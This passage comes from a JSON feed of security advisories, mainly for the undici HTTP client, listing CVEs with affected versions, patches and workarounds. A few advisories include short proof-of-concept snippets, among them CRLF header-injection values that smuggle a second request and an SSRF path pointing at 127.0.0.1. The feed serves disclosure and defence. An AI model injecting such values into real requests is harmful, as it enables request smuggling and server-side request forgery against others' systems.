"https://github.com/jashkenas/underscore/commit/4c73526d43838ad6ab43a6134728776632adeb66" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-14" }, { "type": "WEB", "url": "https://www.npmjs.com/package/underscore" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4883" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-UNDERSCORE-1080984" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1081503" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBJASHKENAS-1081505" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1081504" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240808-0003" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGEE7U4Z655A2MK5EW4UQQZ7B64XJWBV" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKATXXETD2PF3OR36Q5PD2VSVAR6J5Z" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGEE7U4Z655A2MK5EW4UQQZ7B64XJWBV" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKATXXETD2PF3OR36Q5PD2VSVAR6J5Z" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00038.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re69ee408b3983b43e9c4a82a9a17cbbf8681bb91a4b61b46f365aeaf@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re69ee408b3983b43e9c4a82a9a17cbbf8681bb91a4b61b46f365aeaf%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc84926bacd377503a3f5c37b923c1931f9d343754488d94e6f08039@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc84926bacd377503a3f5c37b923c1931f9d343754488d94e6f08039%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raae088abdfa4fbd84e1d19d7a7ffe52bf8e426b83e6599ea9a734dba@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raae088abdfa4fbd84e1d19d7a7ffe52bf8e426b83e6599ea9a734dba%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r770f910653772317b117ab4472b0a32c266ee4abbafda28b8a6f9306@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r770f910653772317b117ab4472b0a32c266ee4abbafda28b8a6f9306%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5df90c46f7000c4aab246e947f62361ecfb849c5a553dcdb0ef545e1@%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5df90c46f7000c4aab246e947f62361ecfb849c5a553dcdb0ef545e1%40%3Cissues.cordova.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/jashkenas/underscore/releases/tag/1.12.1" }, { "type": "WEB", "url": "https://github.com/jashkenas/underscore/blob/master/modules/template.js%23L71" }, { "type": "PACKAGE", "url": "https://github.com/jashkenas/underscore" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2025/Apr/14" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2021-03-31T21:59:00Z", "nvd_published_at": "2021-03-29T14:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3787-6prv-h9w3", "published": "2024-02-16T16:02:52Z", "modified": "2024-05-02T13:15:07Z", "aliases": [ "CVE-2024-24758" ], "related": [ "CVE-2024-24758" ], "summary": "Undici proxy-authorization header not cleared on cross-origin redirect in fetch", "details": "### Impact\n\nUndici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authorization` headers. \n\n### Patches\n\nThis is patched in v5.28.3 and v6.6.1\n\n### Workarounds\n\nThere are no known workarounds.\n\n### References\n\n- https://fetch.spec.whatwg.org/#authentication-entries\n- https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.28.3" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.28.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-3787-6prv-h9w3/GHSA-3787-6prv-h9w3.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.6.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.6.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-3787-6prv-h9w3/GHSA-3787-6prv-h9w3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24758" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/b9da3e40f1f096a06b4caedbb27c2568730434ef" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/d3aa574b1259c1d8d329a0f0f495ee82882b1458" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.28.3" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v6.6.1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240419-0007" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/03/11/1" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2024-02-16T16:02:52Z", "nvd_published_at": "2024-02-16T22:15:08Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3cvr-822r-rqcc", "published": "2022-07-21T20:30:10Z", "modified": "2023-11-08T04:09:27.728154Z", "aliases": [ "CVE-2022-31150" ], "summary": "undici before v5.8.0 vulnerable to CRLF injection in request headers", "details": "### Impact\n\nIt is possible to inject CRLF sequences into request headers in Undici.\n\n```js\nconst undici = require('undici')\n\nconst response = undici.request(\"http://127.0.0.1:1000\", {\n headers: {'a': \"\\r\\nb\"}\n})\n```\n\nThe same applies to `path` and `method`\n\n### Patches\n\nUpdate to v5.8.0\n\n### Workarounds\n\nSanitize all HTTP headers from untrusted sources to eliminate `\\r\\n`.\n\n### References\n\nhttps://hackerone.com/reports/409943\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12116\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-3cvr-822r-rqcc/GHSA-3cvr-822r-rqcc.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-3cvr-822r-rqcc" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31150" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/a29a151d0140d095742d21a004023d024fe93259" }, { "type": "WEB", "url": "https://hackerone.com/reports/409943" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.8.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220915-0002" } ], "database_specific": { "cwe_ids": [ "CWE-93" ], "github_reviewed": true, "github_reviewed_at": "2022-07-21T20:30:10Z", "nvd_published_at": "2022-07-19T21:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3g92-w8c5-73pq", "published": "2024-07-09T13:32:30Z", "modified": "2024-07-09T13:57:47.271493Z", "aliases": [ "CVE-2024-38372" ], "related": [ "CVE-2024-38372" ], "summary": "Undici vulnerable to data leak when using response.arrayBuffer()", "details": "### Impact\n\nDepending on network and process conditions of a `fetch()` request, `response.arrayBuffer()` might include portion of memory from the Node.js process.\n\n### Patches\n\nThis has been patched in v6.19.2.\n\n### Workarounds\n\nThere are no known workaround.\n\n### References\n\nhttps://github.com/nodejs/undici/issues/3337\nhttps://github.com/nodejs/undici/issues/3328\nhttps://github.com/nodejs/undici/pull/3338\nhttps://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.14.0" }, { "fixed": "6.19.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-3g92-w8c5-73pq/GHSA-3g92-w8c5-73pq.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-3g92-w8c5-73pq" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38372" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/issues/3328" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/issues/3337" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/pull/3338" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" } ], "database_specific": { "cwe_ids": [ "CWE-201" ], "github_reviewed": true, "github_reviewed_at": "2024-07-09T13:32:30Z", "nvd_published_at": "2024-07-08T21:15:12Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5r9g-qh6m-jxff", "published": "2023-02-16T20:46:30Z", "modified": "2024-12-16T15:26:50.318903Z", "aliases": [ "BIT-node-2023-23936", "BIT-node-min-2023-23936", "CVE-2023-23936" ], "related": [ "CVE-2023-23936" ], "summary": "CRLF Injection in Nodejs ‘undici’ via host", "details": "### Impact\n\nundici library does not protect `host` HTTP header from CRLF injection vulnerabilities.\n\n### Patches\n\nThis issue was patched in Undici v5.19.1.\n\n### Workarounds\n\nSanitize the `headers.host` string before passing to undici.\n\n### References\n\nReported at https://hackerone.com/reports/1820955.\n\n### Credits\n\nThank you to Zhipeng Zhang ([@timon8](https://hackerone.com/timon8)) for reporting this vulnerability. ", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "5.19.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-5r9g-qh6m-jxff/GHSA-5r9g-qh6m-jxff.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-5r9g-qh6m-jxff" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23936" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/a2eff05401358f6595138df963837c24348f2034" }, { "type": "WEB", "url": "https://hackerone.com/reports/1820955" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.19.1" } ], "database_specific": { "cwe_ids": [ "CWE-74", "CWE-93" ], "github_reviewed": true, "github_reviewed_at": "2023-02-16T20:46:30Z", "nvd_published_at": "2023-02-16T18:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8qr4-xgw6-wmr3", "published": "2022-08-18T18:59:46Z", "modified": "2023-11-08T04:09:53.898548Z", "aliases": [ "CVE-2022-35949" ], "summary": "`undici.request` vulnerable to SSRF using absolute URL on `pathname`", "details": "### Impact\n\n`undici` is vulnerable to SSRF (Server-side Request Forgery) when an application takes in **user input** into the `path/pathname` option of `undici.request`.\n\nIf a user specifies a URL such as `http://127.0.0.1` or `//127.0.0.1`\n\n```js\nconst undici = require(\"undici\")\nundici.request({origin: \"http://example.com\", pathname: \"//127.0.0.1\"})\n```\n\nInstead of processing the request as `http://example.org//127.0.0.1` (or `http://example.org/http://127.0.0.1` when `http://127.0.0.1 is used`), it actually processes the request as `http://127.0.0.1/` and sends it to `http://127.0.0.1`.\n\nIf a developer passes in user input into `path` parameter of `undici.request`, it can result in an _SSRF_ as they will assume that the hostname cannot change, when in actual fact it can change because the specified path parameter is combined with the base URL.\n\n### Patches\n\nThis issue was fixed in `undici@5.8.1`.\n\n### Workarounds\n\nThe best workaround is to validate user input before passing it to the `undici.request` call.\n\n## For more information\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n- To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.8.2" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.8.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-8qr4-xgw6-wmr3/GHSA-8qr4-xgw6-wmr3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-8qr4-xgw6-wmr3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35949" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/124f7ebf705366b2e1844dff721928d270f87895" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.8.2" } ], "database_specific": { "cwe_ids": [ "CWE-918" ], "github_reviewed": true, "github_reviewed_at": "2022-08-18T18:59:46Z", "nvd_published_at": "2022-08-12T23:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9f24-jqhm-jfcw", "published": "2024-02-16T15:59:38Z", "modified": "2024-04-19T09:30:47Z", "aliases": [ "CVE-2024-24750" ], "related": [ "CVE-2024-24750" ], "summary": "fetch(url) leads to a memory leak in undici", "details": "### Impact\n\nCalling `fetch(url)` and not consuming the incoming body ((or consuming it very slowing) will lead to a memory leak. \n\n### Patches\n\nPatched in v6.6.1\n\n### Workarounds\n\nMake sure to always consume the incoming body.\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.6.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.6.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-9f24-jqhm-jfcw/GHSA-9f24-jqhm-jfcw.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-9f24-jqhm-jfcw" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24750" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/87a48113f1f68f60aa09abb07276d7c35467c663" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v6.6.1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240419-0006" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-401" ], "github_reviewed": true, "github_reviewed_at": "2024-02-16T15:59:38Z", "nvd_published_at": "2024-02-16T22:15:07Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9qxr-qj54-h672", "published": "2024-04-04T14:20:54Z", "modified": "2025-11-04T19:44:42Z", "aliases": [ "CVE-2024-30261" ], "summary": "Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect", "details": "### Impact\n\nIf an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered.\n\n### Patches\n\nFixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3.\nFixes has been released in v5.28.4 and v6.11.1.\n\n\n### Workarounds\n\nEnsure that `integrity` cannot be tampered with.\n\n### References\n\nhttps://hackerone.com/reports/2377760", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.28.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-9qxr-qj54-h672/GHSA-9qxr-qj54-h672.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.11.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-9qxr-qj54-h672/GHSA-9qxr-qj54-h672.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30261" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/2b39440bd9ded841c93dd72138f3b1763ae26055" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3" }, { "type": "WEB", "url": "https://hackerone.com/reports/2377760" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240905-0008" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2024-04-04T14:20:54Z", "nvd_published_at": "2024-04-04T15:15:39Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c76h-2ccp-4975", "published": "2025-01-21T21:10:47Z", "modified": "2025-01-21T21:27:05.225594Z", "aliases": [ "CVE-2025-22150" ], "summary": "Use of Insufficiently Random Values in undici", "details": "### Impact\n\n[Undici `fetch()` uses Math.random()](https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113) to choose the boundary for a multipart/form-data request. It is known that the output of Math.random() can be predicted if several of its generated values are known.\n\nIf there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. Therefore, An attacker can tamper with the requests going to the backend APIs if certain conditions are met.\n\n### Patches\n\nThis is fixed in 5.28.5; 6.21.1; 7.2.3.\n\n### Workarounds\n\nDo not issue multipart requests to attacker controlled servers.\n\n### References\n\n* https://hackerone.com/reports/2913312\n* https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.5.0" }, { "fixed": "5.28.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-c76h-2ccp-4975/GHSA-c76h-2ccp-4975.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.21.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-c76h-2ccp-4975/GHSA-c76h-2ccp-4975.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-c76h-2ccp-4975/GHSA-c76h-2ccp-4975.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22150" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/711e20772764c29f6622ddc937c63b6eefdf07d0" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/c2d78cd19fe4f4c621424491e26ce299e65e934a" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/c3acc6050b781b827d80c86cbbab34f14458d385" }, { "type": "WEB", "url": "https://hackerone.com/reports/2913312" }, { "type": "WEB", "url": "https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113" } ], "database_specific": { "cwe_ids": [ "CWE-330" ], "github_reviewed": true, "github_reviewed_at": "2025-01-21T21:10:47Z", "nvd_published_at": "2025-01-21T18:15:14Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cxrh-j4jr-qwg3", "published": "2025-05-15T14:15:06Z", "modified": "2025-05-16T02:07:00Z", "aliases": [ "CVE-2025-47279" ], "related": [ "CGA-gf48-w429-582m" ], "summary": "undici Denial of Service attack via bad certificate data", "details": "### Impact\n\nApplications that use undici to implement a webhook-like system are vulnerable. If the attacker set up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. \n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/pull/4088.\n\n### Workarounds\n\nIf a webhook fails, avoid keep calling it repeatedly.\n\n### References\n\nReported as: https://github.com/nodejs/undici/issues/3895", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.29.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-cxrh-j4jr-qwg3/GHSA-cxrh-j4jr-qwg3.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.21.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-cxrh-j4jr-qwg3/GHSA-cxrh-j4jr-qwg3.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-cxrh-j4jr-qwg3/GHSA-cxrh-j4jr-qwg3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-j4jr-qwg3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47279" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/issues/3895" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/pull/4088" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" } ], "database_specific": { "cwe_ids": [ "CWE-401" ], "github_reviewed": true, "github_reviewed_at": "2025-05-15T14:15:06Z", "nvd_published_at": "2025-05-15T18:15:38Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f772-66g8-q5h3", "published": "2022-08-18T19:02:56Z", "modified": "2023-11-08T04:09:53.836338Z", "aliases": [ "CVE-2022-35948" ], "summary": "Nodejs ‘undici’ vulnerable to CRLF Injection via Content-Type", "details": "### Impact\n\n`=\u003c undici@5.8.0` users are vulnerable to _CRLF Injection_ on headers when using unsanitized input as request headers, more specifically, inside the `content-type` header.\n\nExample:\n\n```\nimport { request } from 'undici'\n\nconst unsanitizedContentTypeInput = 'application/json\\r\\n\\r\\nGET /foo2 HTTP/1.1'\n\nawait request('http://localhost:3000, {\n method: 'GET',\n headers: {\n 'content-type': unsanitizedContentTypeInput\n },\n})\n```\n\nThe above snippet will perform two requests in a single `request` API call:\n\n1) `http://localhost:3000/`\n2) `http://localhost:3000/foo2`\n\n### Patches\n\nThis issue was patched in Undici v5.8.1\n\n### Workarounds\n\nSanitize input when sending content-type headers using user input.\n\n## For more information\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n- To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.8.2" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.8.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-f772-66g8-q5h3/GHSA-f772-66g8-q5h3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-f772-66g8-q5h3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35948" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/66165d604fd0aee70a93ed5c44ad4cc2df395f80" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.8.2" } ], "database_specific": { "cwe_ids": [ "CWE-74", "CWE-93" ], "github_reviewed": true, "github_reviewed_at": "2022-08-18T19:02:56Z", "nvd_published_at": "2022-08-15T11:21:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m4v8-wqvr-p9f7", "published": "2024-04-04T14:20:39Z", "modified": "2025-11-04T19:44:28Z", "aliases": [ "CVE-2024-30260" ], "summary": "Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline", "details": "### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, 